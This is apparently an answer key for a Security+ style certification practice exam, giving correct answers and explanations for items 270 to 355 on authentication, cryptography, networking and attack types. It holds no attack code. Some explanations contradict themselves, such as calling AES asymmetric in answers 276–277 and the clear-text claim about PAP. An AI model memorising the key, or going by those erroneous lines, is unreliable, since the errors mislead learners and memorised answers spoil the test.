A threat assessment looks at events that could exploit vulnerabilities.
A risk assessment is a combination of assessments and is designed to assess factors, including likelihood and impact, that affect an asset.
A penetration test actually attempts to exploit any found weaknesses (usually after a vulnerability assessment) to gain access to systems

Answer 270

A

Whaling

Correct Answer:
Whaling is a social engineering attack that targets people in high-value positions, such as senior executives. It is a form of a phishing attack.
Incorrect Answers:
Spear phishing involves targeting a particular type of user, regardless of rank in the organization, and basing the attack on more detailed, in-depth information in order to convince the target that the phishing e-mail is actually valid.
Vishing is a form of phishing attack that takes place over Voice-over-IP (VoIP) telephone systems.
Pharming is a form of DNS attack.

Answer 271

A

SNMP

Correct Answer:
The Simple Network Management Protocol (SNMP) uses a management information base, or MIB, specific to each device and from which device information can be obtained.
Incorrect Answers:
SMTP, the Simple Mail Transport Protocol, is responsible for sending e-mail.
Syslog is a log server found in UNIX and Linux systems.
An access control list (ACL) resides on network devices and filters traffic coming into and out of a device.

Answer 272

A

Password length
Use of additional character space

Correct Answer:
Password length and the use of additional character space are two important characteristics of password strength and complexity.
Incorrect Answers:
Neither authentication methods nor encryption strength directly affects password strength.

Answer 273

A

Single sign-on

Correct Answer:
Single sign-on is a method of authentication that enables a user to provide one set of credentials and use them throughout an interconnected network. Both Kerberos and Sesame protocols allow single sign-on.
Incorrect Answers:
Multifactor authentication refers to the use of several different factors to authenticate to a system, such as something you know, something you are, and something you have. Multifactor authentication can be used in a single sign-on environment but is not necessarily required.
Single-factor authentication uses only one factor, such as something you know, to authenticate to a system. It can also be used in a single sign-on environment but is not required.
Pass-through authentication can appear to be similar to single sign-on, but it requires all individual systems simply to accept credentials passed from another system without a unified approach.

Answer 274

A

Something you are

Correct Answer: This is an example of “something you are,” like any biometric factor, such as a fingerprint or retinal eye pattern.
Incorrect Answers:
An example of “something you know” would be a password or PIN.
“Something you have” would include a token or smart card.
“Something you do” would be considered swiping a pattern like a pattern unlock on a cell phone.

Answer 275

A

Physically
Logically

Correct Answer:
Networks are typically separated for security purposes either physically, logically, or both.
Physical separation involves separating network hosts by connecting them to different devices.
Logical separation involves separating them through segmented IP subnetworks.
Incorrect Answers:
Separating network hosts either geographically or functionally does not contribute to security.

Answer 276

A

RSA

Correct Answer:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography.

Incorrect Answers:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to initially negotiate, agree upon, and establish a secure session between two parties.

AES is the Advanced Encryption Standard, and it is not used in public key cryptography; it is an asymmetric key cryptography algorithm.

SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

Answer 277

A

RSA

Correct Answer:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography.
Incorrect Answers:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to initially negotiate, agree upon, and establish a secure session between two parties.
AES is the Advanced Encryption Standard, and it is not used in public key cryptography; it is an asymmetric key cryptography algorithm.
SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

Answer 278

A

Something you know

Correct Answer:
A password is memorized, therefore you know it.
Incorrect Answer:
Something you do would be an action unique to you like a written signature.
Something you have is an item on your person like an ID card.
Something you are is an aspect of your physical person that’s unique to you like a fingerprint.

Answer 279

A

Log analysis

Correct Answer:
A log analysis can’t identify patterns alone and requires other data and event sources to identify trends and patterns.
Incorrect Answers:
Trend analysis involves looking at data from various sources, including device logs, to identify patterns over a period of time.
Both qualitative and quantitative analyses are risk assessment techniques.

Answer 280

A

The company’s account policy

Correct Answer:
The company’s account policy.
Incorrect Answers:
Microsoft best practices as well as FIPS might give some good ideas, but there is no law (such as Sarbanes-Oxley) requiring a certain naming convention for user accounts.

Answer 281

A

Cloud services

Correct Answer:
Cloud services can enable users to perform their work via a browser, from anywhere they have Internet connectivity. This can be configured either to allow a local copy along with the cloud copy of the data, or the data can be edited directly within the cloud.
Incorrect Answers:
Virtualization allows multiple virtual machines to run on the same piece of hardware.
Subnetting and network address translation (NAT) are important, but incorrect, security concepts.

Answer 282

A

HIPAA

Correct Answer:
HIPAA regulates the protection of patient data in the healthcare and health insurance industry.
Incorrect Answers:
RMF covers the risk management of U.S. Department of Defense systems; Sarbanes-Oxley and PCI are involved with financial data.

Answer 283

A

Symmetric

Correct Answer:
When using symmetric encryption, both the sender and receiver use the same key.
Incorrect Answers:
Steganography hides data within photos or another piece of data.
Hashing is used to verify data integrity.
Asymmetric cryptography uses a public and private key pair for encryption, so it does not use the same key for both parties.

Answer 284

A

Generator

Correct Answer:
To provide continuous power, you will need a generator, often gas-powered, that can provide power continuously until electrical power is restored. Be sure that you have enough gas! For very critical systems, multiple generators (tested regularly) are a common control.
Incorrect Answers:
A power conditioner helps provide clean power that is less likely to harm systems; it has nothing to do with power outages.
UPSes and battery backups are incorrect because they provide backup power for only a short period of time and are often used to allow a graceful shutdown of less critical systems.

Answer 285

A

Evil twin

Correct Answers:
An evil twin attack is a rogue wireless access point set up to be nearly identical to a legitimate access point.SSID cloaking is a weak security measure designed to hide the broadcasting of a wireless network’s Service Set Identifier.
Incorrect Answers:
MAC spoofing is an attempt to impersonate another host by using its MAC address.
Jamming is an intentional interference with the signal of a wireless network.
It is often part of a DoS attack.

Answer 286

A

802.1X

Correct Answer:
802.1X is a port-based authentication method, not a wireless encryption protocol.
Incorrect Answers:
WPA2 is an advanced encryption protocol, which uses AES.
WEP is a legacy wireless encryption protocol, which has been determined to be very weak and easily broken. It uses the RC4 streaming protocol and weak initialization vectors (24-bit) to encrypt data on wireless networks.
WPA was an interim protocol used to correct some of WEP’s weaknesses. It uses the TKIP protocol.

Answer 287

A

ACL

Correct Answer:
An access control list (ACL) resides on network devices and filters traffic coming into and out of the device.
Incorrect Answers:
SMTP, the Simple Mail Transport Protocol, is responsible for sending e-mail.
The Simple Network Management Protocol (SNMP) uses a Management Information Base, or MIB, specific to each device to obtain device information from.
Syslog is a log server found in UNIX and Linux systems.

Answer 288

A

Infrared

Correct Answer:
Infrared enables communications between devices using a beam of light.
Incorrect Answers:
Neither 802.11 wireless nor Bluetooth technologies perform in this manner.
Near Field Communication is a newer technology in which devices send very low power radio signals to each other by using a special chip implanted in the device.
It requires that the devices be extremely close or touching and is used for a variety of applications, including payments through NFC-enabled smartphones.

Answer 289

A

Rule-based system

Correct Answer:
Rule-based systems use predefined rule sets.
Incorrect Answers:
An anomaly-based system detects unusual network traffic patterns based upon a baseline of normal network traffic.
Signature-based systems use predefined traffic signatures, typically downloaded from a vendor.
Filter-based systems, such as routers and firewalls, base detection on access control lists that specify traffic that is permitted and denied.

Answer 290

A

Containment, eradication, and recovery

Correct Answer:
Containment, eradication, and recovery is the third step of the incident response lifecycle.
Incorrect Answers:
In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.

Answer 291

A

Hashes produce fixed-length digests for variable-length text.
Hashing can be used to protect data integrity.
Hashes are cryptographic representations of plaintext.

Correct Answers:
Hashes are cryptographic representations of plaintext, hashes produce fixed-length digests for variable-length text, and hashing can be used to protect data integrity are all characteristics of hashing.
Incorrect Answers:
Hashes are decrypted using the same algorithm and key that encrypted them is incorrect. Hashes are produced from one-way mathematical functions and cannot be decrypted.

Answer 292

A

Syslog

Correct Answer:
Syslog is a logging facility found in UNIX and Linux systems, which can be used on either a centralized or decentralized basis.
Incorrect Answers:
Centralized log management involves collecting logs from across the network into on system and being able to review them as a group.
Security Information Event Management (SIEM) is a centralized method of obtaining logs and other data from disparate devices across the network.
Decentralized log management means that logs are managed and reviewed on a host-by-host basis, rather than as a centralized, consolidated group.

Answer 293

A

Rule-based access control

Correct Answer:
Rule-based access control is an access control model based upon various access control rules that apply to users, objects, and actions.
Incorrect Answers:
An access control list (ACL) is a physical or logical list that details specific access levels individuals have to access objects.
It is also used on network devices to determine which traffic from various users can enter and exit network devices and access internal hosts.
Access approval lists and metadata tables are distractors and are not valid terms.

Answer 294

A

FM-200

Correct Answer:
FM-200 generally replaced halon in data center fire suppression systems.
Incorrect Answers:
Water is still used to combat certain classes of fires, but it did not replace halon.
Shalon doesn’t exist.
Carbon dioxide is used to combat both liquid and electrical fires, but it did not replace halon.

Answer 295

A

WPA2

Correct Answer:
WPA2 (Wi-Fi Protected Access version 2) currently provides the strongest available encryption for wireless networks.
Incorrect Answers:
WPA and WEP are weaker protocols.
HTTPS is a secure protocol for connecting on the Web, but not within your own network.

Answer 296

A

Privilege creep

Correct Answer:
Privilege creep. Bradley keeps getting new privileges, yet nothing is turned off.
Incorrect Answers:
Authentication failure implies something has gone wrong. There has been no failure in authentication.
The principle of least privilege means that administrators never give a user account more rights and permissions than is needed for the user to do his or her job.
False acceptance rate indicates the level of errors that the system may generate indicating that unauthorized users are identified and authenticated as valid users in a biometric system.

Answer 297

A

Monitor traffic from that specific computer with a protocol analyzer.

Correct Answer:
A protocol analyzer can intercept, log, and allow analysis to be conducted on network traffic, to include source and destination of the traffic.
Incorrect Answers:
None of these options will help track down the information that might be transmitted by a backdoor tool.

Answer 298

A

Load balancer

Correct Answer:
A load balancer is a piece of application software or a hardware appliance that is responsible for balancing user requests and network traffic among several different physical or virtualized hosts.
Incorrect Answers:
The host operating system does not create or manage virtual machines; it merely shares resources with them.
The hypervisor, also called a virtual machine monitor, is a piece of application software that is responsible for creating and managing virtual machines and their associated files on a host.
The guest operating system is the virtual machine itself and is managed by a hypervisor.

Answer 299

A

Availability

Correct Answer:
Availability is the most likely attribute gained through potential redundancy and continuity of operations planning that’s (hopefully) inherent within the cloud environment. Cloud computing usually increases availability of data for users, since it is typically built on highly available, redundant infrastructures.
Incorrect Answers:
Accountability and responsibility can be established through effective security controls and well-written service-level agreements.
Users lose a large measure of control by moving to the cloud.

Answer 300

A

Whitelisting

Correct Answers:
Applications that users are allowed to download, install, and execute are added to a whitelist by an administrator; whitelisting is the opposite of blacklisting.
Incorrect Answers:
Blacklisting involves an administrator adding undesirable or restricted software or applications to a list on content filtering devices, in group policy, or through some other type of mechanisms. This ensures that users are not allowed to download, install, or execute these particular applications.
There is no such term as graylisting. Filtering typically involves checking traffic on a network device, based upon specific characteristics.
The term normally does not apply to software or applications.

Answer 301

A

Operating system

Correct Answer:
Containerization is the process of virtualizing the operating system. Containers often use storage segmentation to separate sensitive and personal data.
Incorrect Answers:
Virtual machines are not virtualized.
Traditional virtualization, not containerization, virtualizes hardware; and while it can be argued that both traditional virtualizations as well as containerization virtualize a system’s interface, that is not the best answer of the choices given.

Answer 302

A

Black box test
Blind test

Correct Answers:
In a black box test, the testers have no knowledge of details about the network configuration, but system defenders are aware of their presence. This type of test is also referred to as a blind test.
Incorrect Answers:
In a double-blind test, testers have no prior knowledge of the network they are testing, and network defenders also have no knowledge of the test and aren’t aware of any attacks unless they can detect and defend against them. This test is designed to test the defenders’ abilities to detect and respond to attacks, as much is it is to test and exploit vulnerabilities on the network.
In a gray box test, the penetration tester may have some limited knowledge of the network or systems, gained from the organization that wants the test.
Unlimited test is not a real test in the Security+ arena.

Answer 303

A

Password complexity

Correct Answer:
Password complexity enforces the use of longer password lengths and character spaces to increase password strength.
Incorrect Answers:
Password history records previous passwords so they cannot be reused in the system.
The maximum password age is used to expire a password after a certain time period.
The minimum password age setting is used to force users to use a password for a minimum amount of time before they are allowed to change it. This prevents them from rapidly cycling through the password history in order to reuse an older password.

Answer 304

A

Plaintext

Correct Answer:
Plaintext is unencrypted text.
Incorrect Answers:
Ciphertext is a result of the encryption process and is encrypted text.
A hash, or message digest, is a cryptographic representation of variable length text, but it is not the text itself.

Answer 305

A

TACACS+ is completely encrypted.

Correct Answer:
TACACS+ encrypts everything between all connection points.
Incorrect Answers:
Kerberos is an open standard as is TACACS+. Open standards are considered more safe than proprietary. T
ACACS+ doesn’t define what encryption to use, but RC4 is dated and insecure.

Answer 306

A

Mean time between failures

Correct Answer:
Mean time between failures (MTBF) represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component. This is assuming that more than one failure will occur, which means that the component will be repaired, rather than replaced.
Incorrect Answers:
Mean time to recovery (MTTR) is the amount of time it takes for a hardware component to recover from a failure.
The mean time to failure (MTTF) is the length of time a device is expected to last in operation. In MTTF, only a single, definitive failure will occur and will require that the device be replaced rather than repaired.
Mean time to replace is not a valid term.

Answer 307

A

Responsibility
Accountability

Correct Answer:
Accountability and responsibility can be established through effective security controls and well-written service-level agreements.
Incorrect Answers:
Lack of control over data and the infrastructure is probably the greatest risk to cloud computing and cannot be completely managed through agreements.
Cloud computing usually increases the availability of data for users, since it is typically built on highly available, redundant infrastructures.

Answer 308

A

Twofish

Correct Answer:
Twofish, a symmetric algorithm, was one of the five finalists for the competition, but it did not win.
Incorrect Answer:
Rijindael was selected as the winner of the NIST competition and became the U.S. government’s Advanced Encryption Standard (AES).
Blowfish is also a symmetric algorithm, but it was not considered in the competition to be the AES.
RC4 is a symmetric streaming cipher commonly seen in WEP and SSL implementations. It was not one of the finalists involved in the AES competition.

Answer 309

A

Full-scale test

Correct Answer:
In a full-scale test, all personnel are usually involved and may actually conduct activities as they would during a real incident. This type of test is more complex and normally requires extensive resources, such as people and equipment, so it is typically conducted infrequently.
Incorrect Answers:
A tabletop exercise is a type of group review.
The documentation review is the simplest form of test, in which the business continuity plan, disaster recovery plan, and associated documents are reviewed by relevant personnel including managers, recovery team members, and anyone else who may have responsibilities directly affecting plans.
In a walkthrough test, team members go through the motions of fulfilling the responsibilities and conducting the activities required during an actual incident or disaster.

Answer 310

A

deny source all destination 192.168.21.0 tcp port 23

Correct Answer:
The ACL should deny all traffic using TCP port 23. Ports 80, 21, and 123 are not related to telnet.
Incorrect Answers:
You should also note that we want to “deny source all,” not permit traffic or deny source 0.0.0.0.

Answer 311

A

Key exchange

Correct Answer:
Key exchange involves generating and exchanging asymmetric keys used for a particular communication session, exchanging public keys in order to use them for public key cryptography.
Incorrect Answers:
Key stretching is a technique used to change weak keys to stronger ones by feeding them into an algorithm to produce an enhanced key.
Key streaming involves sending individual characters of the key through an algorithm and using mathematical XOR function to change the output.
Key repetition is not a valid answer or term.

Answer 312

A

Data disposal

Correct Answer:
Data disposal guidelines explain how different classifications of data should be properly disposed of to ensure that data is not later pieced together or recovered and exploited.
Incorrect Answers:
Clean desk policies often dictate how sensitive information should be stored after hours and while uncleared visitors are near the area.
Protection of personally identifiable information on social media would be part of an organization’s social media policy.
An organization’s information classification policy not only outlines what level of security protections certain data receives, but it also serves to instruct employees on how to treat sensitive data.

Answer 313

A

ICMP

Correct Answers:
ICMP is the protocol used by the ping and traceroute utilities for network diagnostics, and it should be disabled unless it’s being used for important purposes.
Incorrect Answers:
NTP is used by time services, DNS is used for IP/host name resolution, and SNMP enables network monitoring.

Answer 314

A

White hat hacker

Correct Answers:
White hat hackers use their skills to assist in securing systems. They are usually penetration testing professionals or ethical hackers.
Incorrect Answers:
A gray hat hacker uses his or her skills for both good and evil purposes.
A black box tester tests a system without any prior knowledge of the network or infrastructure.
A black hat hacker uses his or her skills for malicious purposes.

Answer 315

A

Spear phishing

Correct Answer:
Spear phishing involves sending e-mail to a particular type of user, regardless of rank in the organization, and basing the attack on more detailed, in-depth information to convince the target that the phishing e-mail is actually valid.
Incorrect Answers:
Whaling is a social engineering attack that targets people in high-value positions, such as senior executives. It is a form of a phishing attack.
Vishing is a form of phishing attack that takes place over Voice-over-IP (VoIP) telephone systems.
Pharming is a form of DNS attack.

Answer 316

A

RSA

Correct Answer:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography. It is used to generate a public and private key pair.
Incorrect Answers:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to negotiate, agree upon, and establish a secure session between two parties.
AES is the Advanced Encryption Standard, which is not used in public key cryptography; it is a symmetric key cryptography algorithm.
SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

Answer 317

A

POP3

Correct Answer:
POP3 is a non-secure client-side e-mail protocol that uses TCP port 110.
Incorrect Answers:
SMTP is a server-side e-mail protocol and is not used over SSL or TLS. SMTP uses TCP port 25.
IMAPS is a secure version of the IMAP4 protocol and is used over SSL or TLS connections on TCP port 993.
IMAP4 is a non-secure client-side e-mail protocol that uses TCP port 143.

Answer 318

A

Proxy

Correct Answer:
A proxy is typically not used as a traffic-filtering device based upon port or protocol, but it makes requests on behalf of internal clients.
Incorrect Answers:
A firewall is a more complex device, most often seen placed behind the border router.
A switch does not filter traffic based upon port or protocol, since it works at a lower level in the OSI model.
A router should be used as a first-level filtering device, because it has the ability to filter on basic characteristics of traffic such as port and protocol.

Answer 319

A

Compensating control

Correct Answer:
A compensating control assists and mitigates the risk an existing control is unable to mitigate.
Incorrect Answers:
The difference between a deterrent control and a preventive control is that it is necessary to have knowledge of the deterrent control for it to work. Users do not need to have knowledge of a preventative control for it to function.
A corrective control is used to correct a condition when there is either no control at all, or the existing control is ineffective. Normally, a corrective control is temporary until a more permanent solution is put into place.
A deterrent control keeps someone from performing a malicious act, provided that they know the control is there and are aware of the consequences for violating it.

Answer 320

A

Key escrow

Correct Answer:
Key escrow involves a third party that holds a special third key in addition to your private and public key pair.
Incorrect Answers:
A CRL (certificate revocation list) is not valid in this scenario, as certificate authorities and registrars are used during the certificate life cycle to publish digital certificates.

Answer 321

A

ARP poisoning attack

Correct Answer:
ARP poisoning is an attempt to send unsolicited ARP messages to a client to add false entries to its ARP cache.
Incorrect Answers:
A session hijacking attack is an attempt to hijack a user’s Web browsing session by stealing cookies or using other network attack methods.
A SYN flood uses TCP SYN segments in its attack, not ICMP.
A smurf attack uses ICMP.

Answer 322

A

Preventative control

Correct Answer:
A preventative control keeps someone from performing a malicious act, provided that she doesn?t know the control is there and is not aware of the consequences for violating it.
incorrect Answers:
A corrective control is used to correct a condition when there is either no control at all of the existing control is ineffective. Normally, a corrective control is temporary until a more permanent solution is put into place.
The difference between a deterrent control and a preventive control is that a deterrent control requires the person to have knowledge of the control in order for it to work. Users do not have to have knowledge of a preventative control for it to function.
A compensating control assists and mitigates the risk an existing control is unable to mitigate.

Answer 323

A

Key streaming

Correct Answer:
Key streaming involves sending individual characters of the key through an algorithm and using a mathematical XOR function to change the output.
Incorrect Answers:
Key repetition is not a valid answer or term.
Key exchange involves generating and exchanging an asymmetric key used for a particular communications session, or exchanging public keys in order to use them for public key cryptography.
Key stretching is a technique used to change a weak key to a stronger key by feeding it into an algorithm to produce an enhanced key.

Answer 324

A

Layer 3 switch

Correct Answer:
A layer 3 switch supports inter VLAN routing to interconnect disparate VLANs.
Incorrect Answers:
A layer 2 switch could interconnect VLAN via trunk ports, but only to interconnect to other layer 2 switches.
A router could interconnect two VLANs, but this would take substantial configuration.
A firewall is not capable of interconnecting VLANs.

Answer 325

A

Mandatory access control model

Correct Answers:
Mandatory access control models use labels and security clearances to grant access to objects.
Incorrect Answers:
Rule-based access control models use a specific set of rules that control the interaction between users and objects.
Role-based access control models use defined roles with specific rights and permissions assigned to those roles to control access to objects.
Discretionary access control allows a user who has created or owns an object, such as a file or folder, the discretion to assign permissions for that object to anyone they choose.

Answer 326

A

Mean time to recovery

Correct Answer:
Mean time to recovery (MTTR) is the amount of time it takes for a hardware component to recover from failure.
Incorrect Answers:
Mean time between failures (MTBF) represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component. This is assuming that more than one failure will occur, which means that the component will be repaired, rather than replaced.
The mean time to failure (MTTF) is the length of time a device is expected to last in operation. In MTTF, only a single, definitive failure will occur and will require that the device be replaced rather than repaired.
Mean time to replace is not a valid term.

Answer 327

A

CHAP

Correct Answer:
Challenge-Handshake Authentication Protocol (CHAP) uses password hashes and challenge methods to authenticate to the system.
Incorrect Answers:
The Password Authentication Protocol (PAP) is an older authentication method that passes usernames and passwords in clear text. For this reason, it is no longer used. Passwords are not passed in clear text with this protocol.
MS-CHAP (Microsoft CHAP) is a Microsoft proprietary version of CHAP, native to Windows systems.
The Extensible Authentication Protocol (EAP) is a modern authentication framework that can use various authentication methods. It also does not pass user name and password information in clear text.

Answer 328

A

Geofencing

Correct Answer:
Geofencing is the use of geolocation features to ensure that a mobile device does not leave specific areas of corporate property.
Incorrect Answers:
Remote management is the overall process of remotely managing and monitoring mobile devices that are used to connect to the corporate infrastructure.
Geolocation is the use of a device’s GPS features to determine device location, locate points of interest, and find other useful information.
Geotagging is the practice of marking media files, such as pictures and video, with relevant information such as geographic location (using the GPS features of the mobile device) and time. This information can be used by security professionals to track where and how a mobile device has been used.

Answer 329

A

Federated trust

Correct Answer:
A federated system involves the use of a common authentication system and credentials database that multiple entities use and share.
Incorrect Answers:
A web of trust isn’t a trust relationship, it is a method to handle trust for certificates.
A one-way trust shows one party trusts another but not the reverse.
A transitive trust is where if entity B trusts entity A and entity C trusts entity B than entity C trusts entity A.

Answer 330

A

Allows physical segmentation of hosts by IP subnet

Correct Answer:
VLANS do not physically segment hosts; they logically segment them.
Incorrect Answers:
VLANs break up broadcast domains from a single large one into smaller, logically separated ones.
VLANS allow different segments to receive different security policies.

Answer 331

A

DHE

Correct Answers:
Diffie-Hellman Exchange (DHE) is a key negotiation and agreement protocol used in public key cryptography.
Incorrect Answers:
RSA is the de facto standard used to generate public and private key pairs in a PKI.
The Online Certificate Status Protocol (OCSP) is used to obtain the revocation status of digital certificates. It is used as an alternative to certificate revocation lists, enabling clients to request and receive the electronic status of digital certificates automatically in real-time.
Elliptic curve cryptography (ECC) is a public key cryptography protocol used on small mobile devices because of its low power and computing requirements.

Answer 332

A

Adware

Correct Answers:
Adware is usually annoying advertisements that come in the form of pop-up messages in a user’s browser.
Incorrect Answers:
A virus is a piece of malicious software that must be propagated through a definite user action.
A Trojan is a piece of software that seems to be of value to the user, but in reality is malware.
A logic bomb is a script set to execute at a certain time, which is usually created by rogue administrators or disgruntled employees.

Answer 333

A

An attack that involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.

Correct Answer:
An XML injection attack involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.
Incorrect Answers:
A buffer overflow attack exceeds the memory allocated to an application for a particular function, causing it to crash.
Although similar to a buffer overflow attack, it describes an integer overflow attack, which uses unexpected numerical results from a mathematical operation to overflow a buffer.
A SQL injection attacks a database through vulnerabilities in the Web application, usually in user input fields.

Answer 334

A

SQL injection attack

Correct Answer:
A SQL injection attack targets relational databases that reside behind Web applications.
Incorrect Answers:
An LDAP injection attack targets directory services databases, such as those used in X.500 implementations.
A directory traversal attack targets non-secure directory structures on the host, such as folder structures.
An integer overflow attack is similar to a buffer overflow attack and results in mathematical operations that the host or application cannot handle, causing them to fail.

Answer 335

A

TPM

Correct Answer:
A Trusted Platform Module (TPM) is installed on an individual device, usually as a chip on the system motherboard.
Incorrect Answers:
A hardware security module (HSM) is usually a hardware appliance or standalone device used to provide hardware encryption services for specific hosts.
A SAN is a storage area network and is not typically a security device.
A NAS, network attached storage, is not a security device.

Answer 336

A

Post-incident activity

Correct Answer:
Post-incident activity is the last step of the incident response life cycle.
Incorrect Answers:
In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.

Answer 337

A

Install and configure SAMBA on the Linux systems to access the AD.
Configure access to the resource on the file server.

Correct Answers:
Install and configure SAMBA on the Linux systems to access the AD and then set up access to the resources on the sharing sysytem (in this case the file server).
Incorrect Answers:
Linux user groups are useless for accessing Windows resources.
One should rarely create local users on a Windows server.

Answer 338

A

Disable SSID broadcasting.

Correct Answer:
Disable Service Set Identifier (SSID) broadcasting if you’re not actively broadcasting your network name. When this control is implemented, a user must know the name of the network before he or she can connect to it.
Incorrect Answers:
None of these options will control access with regard to the SSID.

Answer 339

A

FTP

Correct Answer:
FTP is a non-secure protocol used to copy files to and from Internet-based hosts.
Incorrect Answers:
FTPS is a secure version of the non-secure FTP protocol, which is used over SSL or TLS connections to ensure security when transferring files to or from an Internet-based host.
SCP is a secure copy protocol used to copy files securely to and from a networked host, and it uses SSH.
SFTP is a secure file transfer protocol used to copy files to and from an Internet-based host, and it uses SSH.

Answer 340

A

Accountability

Correct Answer:
Accountability uses auditing to ensure that users are traced to and held responsible for their actions.
Incorrect Answers:
Authorization is the process of controlling access to resources through methods that include permissions, rights, and privileges.
Authentication is the process of validating that a user?s credentials are authentic, after they have presented them through the identification process.
Auditing is the process of reviewing logs and other audit trails to determine what actions have been performed on systems and data.

Answer 341

A

Small text files stored on a browser that contain information about the Web sites you visit.

Correct Answer:
Small text files stored on a browser that contains information about the Web sites you visit are called cookies. In some cases, they are used to retain user preferences for the site, but they can contain sensitive information, such as user credentials or financial data (credit card information, for example) as well.
Incorrect Answers:
HTTP request and response messages are sent back and forth between the Web application and the browser so the client can access content in the Web application.
These HTTP requests and responses have headers that contain information such as commands, directives, and so on.
An HTML file that comes attached to the e-mail is an HTTP attachment. Locally shared objects (also called flash cookies) are objects that are particular to Web sites that use the Adobe Flash player for certain content.

Answer 342

A

Security identifier (SID)

Correct Answer:
A security identifier (SID) is a unique number assigned to each individual user account. It’s never used, even when an account is deleted and re-created.
Incorrect Answers:
Both a UID and GID refer to unique numbers in Linux and UNIX-based systems that identify users and groups.
An access control entry (ACE) is a unique entry in an access control list (ACL) that describes a user’s permissions for accessing objects.

Answer 343

A

NAT with a firewall

Correct Answer:
Using network address translation (NAT) in conjunction with a firewall enables you to share one external address with multiple internal hosts that require external addresses for their connectivity.
Incorrect Answers:
A DMZ can contain servers behind a firewall, allowing public access, but it does not inherently offer NAT services.
DHCP is used to allocate internal IP addresses, and a router still requires NAT to perform address translation.

Answer 344

A

Demonstrative evidence

Correct Answer:
Demonstrative evidence, which can be in the form of charts, graphs, drawings, and so fort, is used to help non-technical people, such as the members of a jury, understand an event.
Incorrect Answers:
Exculpatory evidence proves innocence.
Inculpatory evidence proves guilt.
Documentary evidence directly supports or proves a definitive assertion.

Answer 345

A

Threat assessment

Correct Answer:
A threat assessment looks at events that could exploit vulnerabilities.
Incorrect Answers:
A vulnerability assessment looks for weaknesses in systems.
A risk assessment is a combination of assessments and is designed to assess factors, including likelihood and impact that affect an asset.
A penetration test attempts to exploit actual vulnerabilities found within the systems.

Answer 346

A

Incremental backup
Differential backup

Correct Answers:
Differential and incremental backups apply to entire systems and are used to back up files that have changed since the last full backup.
Incorrect Answers:
A snapshot is a quick backup of critical configuration files, used by the hypervisor to restore the virtual machine back to its point-in-time status should it become unstable or suffer other issues.
The system state backup is a Microsoft Windows type of backup that backs up critical files used by the operating system to restore the system in the event of a system crash or other issue.

Answer 347

A

Notifying and coordinating with senior management and law enforcement officials

Correct Answer:
Notifying and coordinating with senior management and law enforcement officials is normally the job of a senior leader within the incident response team.
Incorrect Answers:
The primary job of a first responder is to secure the scene.
They are also responsible for notifying the incident response team and initially determining the scope, seriousness, and impact of the incident.

Answer 348

A

PGP/GPG

Correct Answer:
Pretty Good Privacy (or GNU Privacy Guard) is a low-cost solution that enables encrypted e-mail messages.
Incorrect Answers:
HTTPS provides encryption for Web communications, not e-mail.
POP/IMAP are unencrypted mail client access protocols.
WPA2 provides encryption for wireless networks, not e-mail.

Answer 349

A

Walkthrough test

Correct Answer:
In a walkthrough test, team members go through the motions of fulfilling the responsibilities and conducting the activities required during an actual incident or disaster.
Incorrect Answers:
A tabletop exercise is a type of group review.
The documentation review is the simplest form of test, in which the business continuity plan, disaster recovery plan, and associated documents are reviewed by relevant personnel including managers, recovery team members, and anyone else who may have responsibilities directly affecting plans.
In a full-scale test, all personnel are usually involved and may actually conduct activities as they would during a real incident. This type of test is more complex and normally requires extensive resources, such as people and equipment, so it is typically conducted infrequently.

Answer 350

A

Hash
Message digest

Correct Answers:
A hash or message digest is a cryptographic representation of variable length text, but it is not the text itself.
Incorrect Answers:
Plaintext is unencrypted text.
Ciphertext is a result of the encryption process and is encrypted text.

Answer 351

A

Deauthentication attack

Correct Answer:
A deauthentication attack involves sending specially crafted traffic to a wireless client and an access point, in the hopes of causing them to deauthenticate with each other and disconnect.
Incorrect Answers:
A spoofing attack involves impersonating a wireless client or access point through either its IP or its MAC address.
A replay attack involves the reuse of intercepted non-secure credentials to gain access to a system or network.
Initialization vector (IV) attacks involve attempting to break WEP keys by targeting their weak IVs.

Answer 352

A

Multifactor authentication

Correct Answer:
Multifactor authentication refers to the use of several different factors to authenticate to a system, such as something you know, something you are, and something you have. Multifactor authentication can be used in a single sign-on environment, but is not necessarily required.
Incorrect Answers:
Single-factor authentication uses only one factor, such as something you know, to authenticate to a system. It can also be used in a single sign-on environment but is not required.
Single sign-on is a method of authentication that enables a user to provide one set of credentials and use them throughout an interconnected network. Both Kerberos and SESAME protocols allow single sign-on.
Pass-through authentication can appear to be similar to single sign-on, but it requires all individual systems to accept credentials passed from another system without a unified approach.

Answer 353

A

Cookies

Correct Answers:
Cookies are saved and used by load balancers to maintain a connection between a specific client and a specific server, i.e. session affinity.
Incorrect Answers:
TLS is an encryption method and session lock is an imaginary term.
Client-based code could be used, but is not common.

Answer 354

A

Private

Correct Answer:
A private cloud is for use by only one organization and is usually hosted by that organization’s infrastructure.
Incorrect Answers:
An external cloud is not a valid type of cloud and could be a public, private, or community cloud.
A community cloud is for use by similar organizations or communities, such as universities or hospitals, that need to share common data.
A public cloud is usually operated by a third-party provider that sells or rents “pieces” of the cloud to different entities, such as small businesses or large corporations.

Answer 355

A

Black hat hacker

Correct Answer:
A black hat hacker is someone who uses her skills for malicious purposes and often shares that information with others.
Incorrect Answers:
